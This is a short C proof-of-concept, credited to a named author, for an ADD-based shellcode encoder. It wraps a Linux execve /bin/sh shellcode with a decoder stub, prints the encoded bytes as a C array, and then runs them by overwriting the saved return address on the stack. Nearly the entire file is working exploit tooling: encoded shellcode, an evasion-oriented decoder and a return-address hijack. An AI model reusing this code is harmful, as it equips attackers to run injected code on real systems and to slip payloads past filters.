/* 
 * Proof-of-concept to test the decoder 
 *
 * Rodrigo Rubira Branco <rodrigo@kernelhacking.com>
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 *
 * ADD Shellcode encoder 
 * 
 */

void execute(char *  data);

int main() {

  char decoder[] =
    // add decoder
    "\xeb\x0c\x5e\x6a\x00\x59\x80\x06\x00\x46\xe2\xfa\xeb\x05\xe8\xef"
    "\xff\xff\xff";

  
  
  /* Linux execve /bin/sh shellcode */
  char shellcode[] =
        "\xeb\x11\x31\xc9\x5e\xb1\x23\x80\x6c\x0e\xff\x17\x80\xe9\x01"
	"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x48\xd7\x67\x7f\x46\x46"
	"\x8a\x7f\x7f\x46\x79\x80\x85\xa0\xfa\xa0\x7b\x3b\x23\xa0\x5b"
	"\x3b\x27\xa4\x63\x3b\x23\xa2\x6b\x3b\x1f\xc7\x22\xe4\x97";
  
  char tmp;
  char *end;
  int size  = 26;
  int i; 
  int l = 15;
  
  for(i=0;i<strlen(shellcode);i++) {
    
    shellcode[i] -= size;
    
  }
  decoder[4]  += strlen(shellcode);
  decoder[8] += size;
  
  end = (char *) malloc(strlen(shellcode) + strlen(decoder));
  
  strcat(end,decoder);
  strcat(end,shellcode);
  
  printf("\nDecoder: %d Shellcode: %d Result %d\n",strlen(decoder),strlen(shellcode),strlen(end));
  
  printf("\n\nchar shellcode[] =\n");
  
  for(i = 0; i < strlen(end); ++i) {
    if(l >= 15) {
      if(i) printf("\"\n");
      printf( "\t\"");
      l = 0;
    }
    ++l;
    printf("\\x%02x", ((unsigned char *)end)[i]);
  }
  
  
  fflush(stdout);
  
  printf("\";\n");
  
  execute(end);
  free(end);
}


void execute(char *data) {
  
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)data;
  
}